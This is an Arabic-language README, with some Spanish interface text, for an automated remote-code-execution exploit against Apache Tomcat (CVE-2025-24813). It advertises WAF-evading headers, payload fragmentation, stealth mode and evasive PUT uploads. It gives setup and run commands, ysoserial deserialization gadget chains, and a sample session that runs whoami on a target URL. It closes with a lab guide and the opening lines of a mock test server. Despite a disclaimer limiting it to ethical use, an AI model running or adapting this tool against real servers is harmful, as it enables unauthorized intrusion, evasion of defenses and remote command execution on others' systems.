
يحتوي هذا المستودع على استغلال (Exploit) آلي تم تطويره لأغراض تعليمية وبحثية في مجال الأمن السيبراني، ويهدف إلى إظهار ثغرة محتملة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Apache Tomcat (CVE-2025-24813).
⚡ الإصدار: 1.0 🛡️ معرّف CVE: CVE-2025-24813 (Apache Tomcat RCE) 🧬 الحمولات:
ysoserial/Java🌐 الوضع: تفاعلي + وضع التخفي 🔬 الاستخدام: أخلاقي، بحثي، تعليمي
صُممت هذه الأداة كـحزمة استغلال مستقبلية تركّز على:
🧪 مصممة لمحترفي الأمن السيبراني، والباحثين، ومختبري الاختراق (Pentesters)، وفرق Red Teams.
✅ واجهة تفاعلية وبديهية
✅ حمولات ديناميكية (ysoserial أو Java مُجمَّعة)
✅ ترويسات متغيرة (كاميليونية) مضادة لـ WAF
✅ تجاوز تلقائي + تجزئة الحمولات
✅ تحديد بصمة التنفيذ في الواجهة الخلفية (Backend)
✅ تسجيل مفصّل لكل هدف
✅ شعار (Banner) ديناميكي بأسلوب Cyberpunk (🔮 رسوم متحركة بتأثير glitch)
✅ Live feedback في وحدة التحكم (مع Rich & Colorama)
ثبّت المتطلبات اللازمة باستخدام:
pip install -r requirements.txt
التبعيات:
requests
colorama
rich
validators
وتأكد من توفر:
Java وjavac في PATHysoserial.jar إذا كنت تستخدم حمولة من نوع ysoserialشغّل السكربت:
python3 POC-Exploit_CVE_2025_24813.py
وأكمل الإعدادات:
🧬 اختر نوع الحمولة 💣 حدّد الأمر 🌐 أدخل عنوان URL للهدف 🔧 اضبط التجاوز وإعدادات SSL
🔗 [?] Ingresa la URL del objetivo: https://victima.org
💣 [?] Comando a ejecutar: whoami
🧬 [?] Tipo de payload: ysoserial
📂 [?] Ruta a ysoserial.jar: ysoserial.jar
🔧 [?] Gadget: CommonsCollections6
🔐 [?] ¿Verificar SSL? (sí/no): no
🚀 Ejecutando...
🧬 WAF detectado... cambiando estrategia
⚙️ Subida del payload en curso...
💥 Confirmación de ejecución remota
✅ Resultado: 'apache'
┌──────────────────────────────┐
│ Modo Interactivo │
├──────────────────────────────┤
│ Validación de URL │
│ Detección de sesión │
│ Detección de WAF │
│ Generación de payload │
│ Subida evasiva via PUT │
│ Verificación de ejecución │
└──────────────────────────────┘
↘ LOGS POR OBJETIVO
ysoserial، ويقوم بتسلسل أدوات (Gadgets) قابلة للاستغلال لتنفيذ الأوامر..java مخصصاً ينفّذ الأمر عن بُعد من الخادم.CommonsCollections6Spring1Jdk7u21POC-Exploit_CVE_2025_24813.py # Script principal
ysoserial.jar # Requerido si usas 'ysoserial'
logs/ # Carpeta de logs individuales por objetivo
payload.ser # Payload generado temporalmente
Exploit.java / .class # Archivos temporales para Java
صُنعت هذه الأداة لأغراض قانونية وتعليمية حصراً.
✅ مسموح:
🚫 ممنوع:
لا يتحمل المؤلف ولا المساهمون أي مسؤولية عن سوء الاستخدام. أنت مسؤول عن سلوكك.
ysoserial, Java, Rich, Colorama, requests📄 CVE-2025-24813: تنفيذ التعليمات البرمجية عن بُعد في Apache Tomcat 🔗 عرض التفاصيل على CVE MITRE
MIT License
Copyright (c) 2025
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files...
راجع ملف
LICENSEلمزيد من المعلومات.
صُمم هذا README والسكربت لتقديم تجربة غامرة، بصرية وأنيقة، تنسجم مع عصر جديد من الأمن السيبراني المستقبلي الهادف.
✨ ليست مجرد استغلالات... بل سيمفونية تقنية من التجاوز والتحكم الرقمي.
الإصدار الموصى به: Python 3.8+
مكتبات Python التي يجب تثبيتها:
pip install requests colorama
يستخدم السكربت شكلين من الحمولات:
لذلك تحتاج إلى:
Java JDK (وليس JRE فقط، لأن الكود يُجمَّع). تحقق باستخدام:
java -version
javac -version
إذا كان كلا الأمرين يعملان، فأنت جاهز.
حمّل ملف .jar من هنا 👉 https://github.com/frohoff/ysoserial
احفظه في نفس دليل السكربت أو حدد المسار الكامل عندما يُطلب منك ذلك. مثال:
java -jar ysoserial.jar CommonsCollections6 "calc.exe" > test.ser
calc.exe) الآلة الحاسبة.gnome-calculator أو xcalc.تثبيت Python 3.8+
تثبيت المكتبات:
pip install requests colorama etc
تثبيت Java JDK 8+
java -version
javac -version
تنزيل ysoserial.jar في مجلد السكربت.
👉 بعد كل ما سبق، ستتمكن من تشغيل السكربت في وضع المختبر الآمن (فقط داخل بيئات خاضعة للتحكم، ولأغراض الاختبار).
الإصدار: 1.0 الغرض: يشرح هذا الدليل كيفية إعداد بيئة آمنة تماماً لاختبار السكربت لديك دون التأثير على أنظمة حقيقية. يتضمن خادم اختبار (Mock)، ووضعاً آمناً (DRY_RUN / SAFE_TEST)، وخطوات واضحة لتشغيل الأداة في المختبر.
pip.virtualenv أو venv.ثبّت التبعيات:
python3 -m venv .venv
source .venv/bin/activate # Linux / macOS
.\.venv\Scripts\activate # Windows (PowerShell/Command Prompt)
pip install -U pip
pip install requests colorama flask
ملاحظة: تُستخدم
flaskفقط لخادم الاختبار المحلي (Mock).
أنشئ ملفاً باسم mock_server.py يتضمن هذا المحتوى. يحاكي الخادم نقاط النهاية (Endpoints) التي يتوقعها السكربت ويعيد حالات خاضعة للتحكم (200، 409، 500) لتتمكن من التحقق من منطق السكربت دون لمس خوادم حقيقية.
# mock_server.py — servidor de pruebas seguro
from flask import Flask, request, make_response, jsonify